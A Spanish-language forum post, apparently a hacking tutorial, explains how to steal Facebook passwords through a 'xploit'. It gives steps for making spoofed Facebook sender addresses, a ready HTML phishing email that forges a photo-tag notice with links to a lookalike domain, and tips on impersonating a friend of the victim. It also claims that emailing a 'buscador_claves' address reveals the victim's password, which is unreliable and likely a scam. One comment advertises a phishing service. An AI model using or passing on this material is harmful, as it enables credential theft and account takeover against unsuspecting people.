El post que buscas se encuentra eliminado, pero este también te puede interesar

xploit

Xploit Facebook, Claves Garantizadas!![Probado][Recomendado](LUISHAKER)


Antes de comenzar debo mencionar y aclarar que el siguiente Xploit, así como los demás, utiliza un hosting especial para enviar los emails, digo especial porque hoy en día es muy difícil encontrar un buen hosting que envíe este tipo de mensajes, así es que no deben usarlo excesivamente o si no se saturará por lo que su servidor web de alojamiento de datos puede ser limitado o incluso inservible en un futuro. Por ello deben poner sumo cuidado a las indicaciones y enviar solamente 1 vez (por día) este Fake.

Les hablaré en esta oportunidad de un Xploit para Facebook. Una peculiar e inusual manera de saber las contraseñas de nuestros ´´amigos´´. Lo menciono porque entre más conozcamos a nuestra víctima más sencillo será averiguar su clave y en la red de Facebook es aún más fácil, porque existen diferentes opciones que en el servicio de Windows Live, Hotmail.

Para comenzar deben:

1. Crear una dirección de correo electrónico que sea únicamente para el envío de mensajes de Facebook. Tratando de sustituir al remitente auténtico, claro está. Aquí te presento algunos ejemplos:

notificationfacebook.zrdoi1idzfvz@hotmail.com
notification_zgoo1iee.facebook@hotmail.com
facebookmail.internet@hotmail.com
comunicaciones.facebook@hotmail.com
facebook.updatezdft7@hotmail.com
noreplymail_facebook@hotmail.com
updatefacebook.z6fdo_tzjj6@hotmail.com

Nota: Algunas características de los ejemplos de correos anteriores pueden ser inválidas para el servicio de registro de Hotmail por lo que se aconseja sustituir palabras por signos o símbolos, vocales por consonantes, puntos por comas o guiones bajos, etc.

2. Ponle un nombre real a tu nuevo correo, aquí te doy algunos ejemplos (Toma en cuenta los puntos, las comas, los guiones bajos y comillas):

Facebook; Facebook,; Facebook.; Facebook_; ´´Facebook´´; .Facebook.; etc.

Nota: Para poder emplear estos nombres a la hora de registrarte en Hotmail como nuevo usuario deberás hacerlo así: El registro te presentará unos campos que deberás rellenar con NOMBRE y APELLIDO, en el primero escribirás ej.: Facebook y, en APELLIDO pondrás el signo de puntuación especial que elijas o escojas de los que te he presentado como ( _ ) guiones, ( , ) comas, ( . ) puntos o ( "" ) comillas.

3. Abres tu nuevo correo y das clic en ´´Nuevo´´.

4. El asunto es a tu elección y según el ´´Nombre de alguien conocido de tu víctima´´ seguido de la frase: etiqueto una foto tuya en Facebook, ejemplo: Fátima Guerrero etiqueto una foto tuya en Facebook.

5. Cambia el formato del texto a ´´Editar en HTML´´. Esto es muy importante.

6. Copia y pega lo que se presenta a continuación (cambia o sustituye lo que se te indica en las comillas luego bórralas) :



<br>


´´Nombre de alguien conocido de la víctima´´ ha etiquetado una foto tuya en su álbum.<br>

<br>

Para ver las fotos, sigue el siguiente enlace:<br>
<br>
<a href='http://img.album.facebook.com.ghm9.com.ar/?r=23JK24J2K2lnml&ID=´´correo de la víctima´´&code=&uid=cancel&refer=&i=3jk3j' target='_blank'>
http://www.facebook.com/n/?<wbr>photo.php&pid=439128&op=1&<wbr>view=all&subj=1101827805&id=<wbr>1405875231&mid=<wbr>a0d79cG41ac8eddG8ac16dG5</a><br>

<br>

Gracias,<br>

El equipo de Facebook<br>

<br>

__________________<br>

Este mensaje estaba destinado a ´´correo de la víctima´´. Deseas controlar los
mensajes de correo electronico
que recibes de Facebook? Visita:<br>

<a href='http://img.album.facebook.com.ghm9.com.ar/?r=23JK24J2K2lnml&ID=´´correo de la víctima´´&code=&uid=cancel&refer=&i=3jk3j' target='_blank'>
http://www.facebook.com/<wbr>editaccount.php?notifications&<wbr>md=<wbr>cGhvdG9fdGFnO2Zyb209MTQwNTg3NT<wbr>IzMTt1aWQ9MTQwNTg3NTIzMTtwaWQ9<wbr>NDM5MTI4O3RvPTExMDE4Mjc4MDU=&<wbr>mid=a0d79cG41ac8eddG8ac16dG5</a><br>
<br>
Las oficinas de Facebook están en 1601 S. California Ave., Palo Alto, CA
94304.






IMPORTANTE: Debes cambiar el ´´correo de la víctima´´ en los tres lugares señalados por las comillas en el Xploit.

SUGERENCIA: Coloca a alguien que sea muy cercano a tu víctima para que así sea más ´´confiable y seguro´´ para ella ´´caer´´ en tu mensaje.

7. Haz clic en ´´Permitir Acceso´´ en el cuadro de dialogo que te aparecerá cuando estés pegando el Fake.

8. Envías tu mensaje.

Ahora, para saber la contraseña de tu víctima debes:

1. Enviar un mensaje a buscador_claves.windowslive@hotmail.com, con tu dirección de correo personal o común.

Nota: Aunque en éste correo se específica ´´windows live´´ funciona como buscador para todas las cuentas que se indican en ésta página (Hotmail, Yahoo!, Gmail y Facebook).

2. Escribes como Asunto: ´´Revelar Clave Facebook´´.

3. Anotas el correo de tu víctima. Debes colocarlo correctamente, sin errores, para encontrarlo en el buscador. Ya que si anotas otro o cambias tan solo un signo o palabra se hará muy difícil enviarte el mensaje respuesta con la clave de tu víctima.

Espero sea de utilidad...

¡Ah! recuerden, en muchos casos sabiendo la clave de acceso del Face de alguién también estan consiguiendo su contraseña para Hotmail, asi es que todo va ligado... Matan dos pajaros de un tiro...

Anuncios

6 comentarios - xploit

@cagada12
pupodemos hablar esta muy interesante tu esplicacciom
@alcatraz24
LanzadorX, es un sitio donde podras hackear las contraseñas de tus amigos/as, novios/as, jefes/as!! podras descubrir passwords de Hotmail, Gmail, Yahoo, Facebook y Tuenti por metodo de xploits (envio de emails falsos) y no solo eso, sino que también contamos con un software que guarda en la base de datos las contraseñas del msn que estan almacenadas en la pc!
Por cierto, las contraseñas almacenadas en nuestra base de datos siempre serán las correctas! ya que comprueba el login antes de guardarlo y si es incorrecto le pide que vuelva a introducir la contraseña.

Instrucciones:

1. Ingresar a http://www.shortlinks.pw/?r=34275
2. Rellenas el formulario de Registro.
3. Abre tu correo y confirma tu cuenta con el email de confirmacion que te envian.
4. Inicia sesion en http://www.shortlinks.pw/?r=34275
5. Selecciona el tipo de xploit que deseas enviar
6. Pon los datos de tu victima
7. Dale a enviar (Alli puedes poner Cancelar y se enviara desde sus servidores, sino poniendo Aceptar puedes crear un correo falso en Gmail o Hotmail para enviarlo desde ese correo y llegara seguro a bandeja de entrada)
8. Cuando tu victima abra el xploit (correo falso que se le envio) la contraseña te llegara a Passwords en tu cuenta de LanzadorX y seras notificado por email.

Les dejo el link: http://www.shortlinks.pw/?r=34275
@Rmx153
exelente!!!